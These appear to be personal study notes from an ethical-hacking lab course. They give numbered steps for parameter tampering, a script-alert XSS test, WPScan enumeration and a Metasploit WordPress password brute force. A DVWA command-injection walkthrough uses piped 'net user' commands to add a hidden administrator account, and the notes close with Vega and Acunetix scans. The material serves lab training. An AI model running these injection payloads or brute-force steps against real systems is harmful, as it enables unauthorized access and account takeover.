- Parameter Tampering
- WPScan – Enumerate wordpress site
- Vega – Test for web application vulnerabilities takes at least 30 mins
Parameter Tampering - Log into website
From Windows or Kali box
A. Open website and log in to site
B. EG: If profile page has xxxxxxx.aspx?id=1 change it to 2 or 3 to see different profile
A. Log into site or find area to submit free text COMMENT BOX or similar
B. In free text box enter
C. <script>alert("Text you want to display")</script>
From Kali box
A. In terminal type wpscan --url http://[IP Address of Windows Server 2012]:8080/CEH --enumerate u and press Enter.
B. WPScan will display any passwords available
C. Using msfconsole
D. Type msfconsole
E. type use auxiliary/scanner/http/wordpress_login_enum and press Enter.
- Type set PASS_FILE /root/Desktop/Wordlists/Passwords.txt and press Enter to set file containing the passwords.
- Type set RHOSTS [IP Address of Target] and press Enter to set the target IP Address.
- Type set RPORT 8080 and press Enter to set the target port.
- Type set TARGETURI http://[IP Address of Windows Server 2012]:8080/CEH/ and press Enter to set the base path to the WordPress website.
- Type set USERNAME admin and press Enter to set the username as admin. (Admin is an example you can use any username already found)
K. Type run and press Enter
L. Scroll through results to see if successful
From a windows box
A. Open DVWA website
B. click Command Injection in the left pane. Ping target server to see if it can reach it
C. | hostname may give a reply if it is very insecure
D. click DVWA Security - Select low option from the drop-down list, and click Submit
E. see if | hostname now works from command injection tab
F. Type | whoami and click Submit. (The application displays the user, group, and privileges information for the user currently logged onto the target machine
G. Type | tasklist and click Submit (A list of all the running processes is displayed)
H. Type | dir C:\ and click Submit to view the files and directories in C:\.
I. To view user account information, type | net user and click Submit.
J. Try creating an account named Jumbo. Type | net user Jumbo /Add and click Submit.
K. view the new account’s information. Type | net user Jumbo and click Submit.
L. To grant administrative privileges, type | net localgroup Administrators Jumbo /Add and click Submit.
M. Once account is made you should be able to RDP or SSH to server with account Jumbo and a blank password
VEGA – Web vulnerability scanner takes at least 30 mins
From kali box
A. Open Vega – Scan – Start new Scan – Enter url of target EG: http://10.10.10.12:8080/dvwa Next - check both Injection Modules and Response Processing Modules options – next –
B. In Authentications Options, section leave the settings to default and click Next
C. In Parameters section, leave the settings to default and click Finish to initiate the scan.
D. under Scan Alerts expand the node to view complete vulnerability scan result.
From windows box
A. Run Acunetix - Click Add Target - type the Target website URL in the Address field, and provide a description in the Description field and click Add Target.
B. Once you added the Target site, Target Info page appears with the General information tab. Choose High in the Business Criticality drop-down list and leave the other settings to default, click Save. – Click Scan
C. Choose Scanning Options pop-up appears, choose Full Scan from Scan Type, OWASP Top 10 2013 from Report, and Instant from Schedule drop-down lists, click Create Scan.
D. Acunetix completes the scan and displays with the Threat Level. Now click Vulnerabilities to view the vulnerabilities found in the targeted website.